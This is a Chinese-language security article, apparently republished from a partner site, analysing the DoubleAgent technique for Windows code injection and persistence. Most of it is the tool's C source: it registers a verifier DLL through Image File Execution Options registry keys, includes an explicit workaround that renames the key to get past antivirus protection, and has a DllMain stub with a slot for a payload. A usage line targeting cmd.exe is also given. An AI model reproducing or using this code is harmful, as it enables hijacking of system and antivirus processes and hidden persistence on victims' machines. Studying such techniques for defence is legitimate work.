本文讲的是
零日漏洞DoubleAgent的代码注入和持久性攻击技术分析,
1.从XP到Windows 10的所有Windows 版本都受到了影响, 2.含有x86和x64的Windows架构都受到了影响, 3.Windows的SYSTEM 和 Admin 用户都受到了影响, 4.含有OS及Antivirus特权进程的Windows设备都受到了影响,
Usage: DoubleAgent.exe installuninstallrepair process_name e.g. DoubleAgent.exe install cmd.exe
/* * Installs an application verifier for the process */ DOUBLEAGENT_STATUS VERIFIER_Install(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName, IN PCWSTR pcwszVrfDllPathX86, IN PCWSTR pcwszVrfDllPathX64); /* * In some cases (application crash, exception, etc.) the installuninstall functions may accidentally leave the machine in an undefined state * Repairs the machine to its original state */ DOUBLEAGENT_STATUS VERIFIER_Repair(VOID); /* * Uninstalls the application verifier from the process */ VOID VERIFIER_Uninstall(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName);
/* Creates the VerifierDlls value and sets it to the verifier dll name */ bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_VERIFIERDLLS_VALUE_NAME, REG_SZ, pcwszVrfDllName, dwVrfDllNameLenInBytes)); /* * Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER * Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/ff542875(v=vs.85).aspx */ bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_GLOBALFLAG_VALUE_NAME, REG_DWORD,
&dwGlobalFlag, sizeof(dwGlobalFlag)));
/* Creates the VerifierDlls value and sets it to the verifier dll name */ bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_VERIFIERDLLS_VALUE_NAME, REG_SZ, pcwszVrfDllName, dwVrfDllNameLenInBytes)); /* * Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER * Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/ff542875(v=vs.85).aspx */ bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_GLOBALFLAG_VALUE_NAME, REG_DWORD, &dwGlobalFlag, sizeof(dwGlobalFlag))); /* * The key creation might fail because some antiviruses protect the keys of their processes under the IFEO * One possible bypass is to rename the IFEO key name to a temporary name, create the keys, and restores the IFEO key name */ if ((FALSE == bCreatedVerifierDlls) || (FALSE == bCreatedGlobalFlag)) { /* Renames the IFEO key name to a temporary name */ if (ERROR_SUCCESS != RegRenameKey(hIfeoKey, NULL, VERIFIER_IMAGE_FILE_EXECUTION_OPTIONS_NAME_TEMP)) { DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGRENAMEKEY_FAILED); goto lbl_cleanup; } bKeyRenamed = TRUE; /* * Opens the temporary IFEO key * The key is reopened because some antiviruses continue monitoring and blocking the handle that opened the original IFEO */ if (ERROR_SUCCESS != RegOpenKeyExW(HKEY_LOCAL_MACHINE, VERIFIER_IMAGE_FILE_EXECUTION_OPTIONS_SUB_KEY_TEMP, 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &hIfeoKeyTemp)) { DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGOPENKEYEXW_FAILED_TEMP_IFEO); goto lbl_cleanup; } if (FALSE == bCreatedVerifierDlls) { /* Tries again to create the VerifierDlls value */ if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName, VERIFIER_VERIFIERDLLS_VALUE_NAME, REG_SZ, pcwszVrfDllName, dwVrfDllNameLenInBytes)) { DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGSETKEYVALUEW_FAILED_VERIFIERDLLS); goto lbl_cleanup; } bCreatedVerifierDllsTemp = TRUE; } if (FALSE == bCreatedGlobalFlag) { /* Tries again to create the GlobalFlag value */ if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName, VERIFIER_GLOBALFLAG_VALUE_NAME, REG_DWORD, &dwGlobalFlag, sizeof(dwGlobalFlag))) { DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGSETKEYVALUEW_FAILED_GLOBALFLAG); goto lbl_cleanup; } bCreatedGlobalFlagTemp = TRUE; } }
static BOOL main_DllMainProcessAttach(VOID) { DOUBLEAGENT_STATUS eStatus = DOUBLEAGENT_STATUS_INVALID_VALUE; /* ************************************************************************** Enter Your Code Here ************************************************************************** */ /* Succeeded */ DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_SUCCESS); /* Returns status */ return FALSE != DOUBLEAGENT_SUCCESS(eStatus); }
原文发布时间为:2017年4月1日
本文作者:xiaohui
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。